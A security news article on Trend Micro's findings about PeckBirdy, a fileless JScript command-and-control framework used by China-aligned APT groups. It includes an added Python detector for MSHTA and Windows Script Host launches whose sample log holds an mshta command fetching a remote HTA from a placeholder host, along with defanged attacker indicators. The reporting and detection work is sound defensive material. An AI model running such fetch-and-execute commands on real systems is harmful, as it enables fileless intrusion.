A sophisticated new cyberweapon has been spotted in the arsenals of China-aligned Advanced Persistent Threat (APT) groups, marking a significant evolution in how state-sponsored actors evade detection. A new report by Trend Micro unveils PeckBirdy, a lightweight, script-based command-and-control (C&C) framework that has been quietly operating since 2023, targeting Asian government entities, the Chinese gambling industry, and educational institutions.
Built entirely on JScript, PeckBirdy leverages the Windows Script Host to execute commands without dropping heavy files that antivirus software might flag.
According to the Trend Micro report, “PeckBirdy is a JScript-based command-and-control (C&C) framework used by China-aligned APT actors since 2023, designed to execute across multiple environments, enabling flexible deployment”.

By injecting code dynamically at runtime, the framework leaves almost no physical footprint. “Detecting malicious JavaScript frameworks remains a significant challenge due to their use of dynamically generated, runtime-injected code and the absence of persistent file artifacts”.
PeckBirdy rarely works alone. The researchers identified two potent modular backdoors deployed alongside it: HOLODONUT and MKDOOR. These modules extend the framework’s reach, allowing attackers to maintain persistent access and exfiltrate sensitive data.
“Two modular backdoors, HOLODONUT and MKDOOR, extend PeckBirdy’s attack capabilities beyond its core functionality”.
Trend Micro’s investigation linked PeckBirdy to at least two specific campaigns, dubbed SHADOW-VOID-044 and SHADOW-EARTH-045.
- SHADOW-VOID-044: This campaign utilized stolen code-signing certificates and standard Cobalt Strike payloads to breach targets. It notably exploited the CVE-2020-16040 vulnerability, hosting malicious infrastructure across multiple domains to stay resilient against takedowns.
- SHADOW-EARTH-045: In July 2024, this campaign struck a Philippine educational institution. The attackers executed an MSHTA command—a classic fileless technique—to connect to github[.]githubassets[.]net and launch PeckBirdy on a compromised IIS server.
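The MSHTA launch described above (a script host pulling its payload from a remote host rather than from a file on disk) is visible in process-creation telemetry even when nothing is written to disk. The following detector is an added example, not code from the article or from Trend Micro's report: it scans constructed records shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage) and flags Windows Script Host or mshta.exe launches that take a remote URL or that are spawned by a parent process that should not be running scripts. The parent list (w3wp.exe as the IIS worker process, Office binaries) and the sample log lines, including the placeholder host example-c2.invalid, are assumptions made for the example.

```python
"""
Added example (not from the Trend Micro report or the article): flag the
fileless MSHTA / Windows Script Host launch pattern in process-creation
telemetry.  The records below are constructed to resemble Sysmon Event ID 1
fields; hostnames, paths and parent processes are illustrative only.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Script hosts that can fetch and run script content without a payload on disk.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Parents from which a script-host launch is unexpected.  Assumption: w3wp.exe
# is the IIS worker process, so a web server spawning mshta.exe matches the
# "compromised IIS server" scenario in the article; Office binaries are a
# common phishing entry point and are included for the same reason.
SUSPICIOUS_PARENTS = {"w3wp.exe", "winword.exe", "excel.exe", "outlook.exe"}

# A remote URL as a script-host argument means the script never touches disk.
URL_RE = re.compile(r"""\b(?:https?|ftp)://[^\s"']+""", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    image: str
    reasons: List[str]


def parse_record(line: str) -> Dict[str, str]:
    """Parse one constructed 'Key=value|Key=value' process-creation record."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(record: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when a script host launch looks fileless or misparented."""
    image = basename(record.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return None
    cmd = record.get("CommandLine", "")
    parent = basename(record.get("ParentImage", ""))
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("script host given a remote URL (no on-disk script)")
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by unexpected parent {parent}")
    if not reasons:
        return None
    return Finding(int(record.get("ProcessId", "0")), image, reasons)


def scan(lines: List[str]) -> List[Finding]:
    """Run the detector over a list of raw records and collect the hits."""
    findings = []
    for line in lines:
        finding = analyze(parse_record(line))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real logs).
SAMPLE_LOG = [
    # Benign: a local maintenance script run by a service host.
    "ProcessId=4120|Image=C:\\Windows\\System32\\cscript.exe"
    "|CommandLine=cscript.exe C:\\scripts\\cleanup.vbs"
    "|ParentImage=C:\\Windows\\System32\\svchost.exe",
    # Matches the campaign pattern: IIS worker launches mshta with a remote URL
    # (placeholder host, not the domain from the report).
    "ProcessId=5532|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta http://example-c2.invalid/index.hta"
    "|ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe",
    # Script host with a local file but spawned by a word processor.
    "ProcessId=7044|Image=C:\\Windows\\System32\\wscript.exe"
    "|CommandLine=wscript.exe C:\\Users\\Public\\update.js"
    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    # Unrelated process.
    "ProcessId=6001|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe|ParentImage=C:\\Windows\\explorer.exe",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"pid {hit.pid} {hit.image}: " + "; ".join(hit.reasons))
```

The two signals are deliberately independent: the remote-URL check catches the fileless fetch regardless of parent, and the parent check catches a script host that was handed a local file by a process with no business running scripts. In a real deployment the parent list and URL pattern would be tuned against the environment's own baseline of legitimate WSH usage.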
The researchers found tentative links between these attacks and known groups like Earth Lusca and Earth Baxia, though definitive attribution remains complex. For instance, an IP address used in the Philippine attack (47[.]238[.]184[.]9) had previously been linked to Earth Baxia operations.